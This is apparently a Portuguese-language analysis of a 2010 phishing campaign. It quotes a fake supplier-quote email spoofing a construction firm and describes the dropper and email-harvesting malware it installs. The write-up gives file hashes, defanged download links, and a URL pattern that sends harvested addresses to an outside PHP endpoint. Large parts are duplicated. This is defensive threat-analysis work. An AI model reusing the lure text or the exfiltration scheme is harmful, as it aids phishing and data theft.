Alerta: Se não souber o que esta fazendo não manipule os arquivos dos links pois os mesmos poderão infectar sua máquina.
O arquivo TomadadePrecos.exe é obtido após descompactar o ZIP.
TomadadePrecos.exe MD5(e92adc2ebc62114fb77f5116ff9adfde)
Quando executado
- Cria a pasta C:\WINDOWS\Sun\Java\Deployment\
- Obtem outro arquivo de hXXp://www.2shared.com/file/bNnqZ_08/file.html
+ Nome: file.zip - MD5 (f1c8a186659ab78fd22d7627eb6b0693)
+ Tamanho do Arquivo: 803 KB
+ Disponibilizado: 23-08-2010
- Dentro da pasta criada é descompactado novos arquivos
+ gtmcm.dll - MD5(d6456713bced4f9906cf094157f1f953)
+ mdfpower.exe - MD5(80e1a7b85bb9c4577a07badd613ec2f6)
- Registra a DLL
+ cgtmcm.dll
- Remove do Registro as DLL´s
+ gmecm1.dll
+ tgpctrl
Obs: O link hXXp://www.2shared.com/file/bNnqZ_08/file.html foi denunciado e não esta disponível.
Análise mdfpower.exe
É um coletor de emails o qual busca arquivos do tipo: .wab, .mai, .tbb, mbx
Após coletar os email ele conecta-se no site/serviço PHP e envia os email capturados.
Exemplo:
hXXp://www.rafamodesto.com/php/sendermail.php?ntidpc=NO_DO_PC_INFECTADO&ntemail=| email1|email2|....|
Autor da Análise: Fidqsi
From: "compras@tecnisa.com.br" <rosana@ficar-net.com.br>
To: <tefen_reut@nahsholim.org.il>
Sent: Tuesday, August 24, 2010 1:19 PM
Subject: TECNISA CONSTRUTORA
Caro parceiro comercial, nós da equipe de compras da TECNISA CONSTRUTORA LTDA, estamos realizando uma cotação de preços (Orçamento),
Caso esteja interessado favor enviar sua proposta, constando preços,formas de pagamento,e o prazo para entrega,
Consulte os itens descriminados no arquivo em anexo no link abaixo.
Estamos aguardando a resposta na certeza de realizarmos bons negócios,pedimos urgência na resposta (3 dias úteis),
Tendo em vista a nossa necessidade em honrar nossos compromissos com nossos clientes.
Orcamento: hXXp://www.fileden.com/files/2010/4/21/2835583/TomadadePrecos.zip
To: <tefen_reut@nahsholim.org.il>
Sent: Tuesday, August 24, 2010 1:19 PM
Subject: TECNISA CONSTRUTORA
Caro parceiro comercial, nós da equipe de compras da TECNISA CONSTRUTORA LTDA, estamos realizando uma cotação de preços (Orçamento),
Caso esteja interessado favor enviar sua proposta, constando preços,formas de pagamento,e o prazo para entrega,
Consulte os itens descriminados no arquivo em anexo no link abaixo.
Estamos aguardando a resposta na certeza de realizarmos bons negócios,pedimos urgência na resposta (3 dias úteis),
Tendo em vista a nossa necessidade em honrar nossos compromissos com nossos clientes.
Orcamento: hXXp://www.fileden.com/files/2010/4/21/2835583/TomadadePrecos.zip
O arquivo TomadadePrecos.exe é obtido após descompactar o ZIP.
TomadadePrecos.exe MD5(e92adc2ebc62114fb77f5116ff9adfde)
Quando executado
- Cria a pasta C:\WINDOWS\Sun\Java\Deployment\
- Obtem outro arquivo de hXXp://www.2shared.com/file/bNnqZ_08/file.html
+ Nome: file.zip - MD5 (f1c8a186659ab78fd22d7627eb6b0693)
+ Tamanho do Arquivo: 803 KB
+ Disponibilizado: 23-08-2010
- Dentro da pasta criada é descompactado novos arquivos
+ gtmcm.dll - MD5(d6456713bced4f9906cf094157f1f953)
+ mdfpower.exe - MD5(80e1a7b85bb9c4577a07badd613ec2f6)
- Registra a DLL
+ cgtmcm.dll
- Remove do Registro as DLL´s
+ gmecm1.dll
+ tgpctrl
Obs: O link hXXp://www.2shared.com/file/bNnqZ_08/file.html foi denunciado e não esta disponível.
Análise mdfpower.exe
É um coletor de emails o qual busca arquivos do tipo: .wab, .mai, .tbb, mbx
Após coletar os email ele conecta-se no site/serviço PHP e envia os email capturados.
Exemplo:
hXXp://www.rafamodesto.com/php/sendermail.php?ntidpc=NO_DO_PC_INFECTADO&ntemail=| email1|email2|....|
Autor da Análise: Fidqsi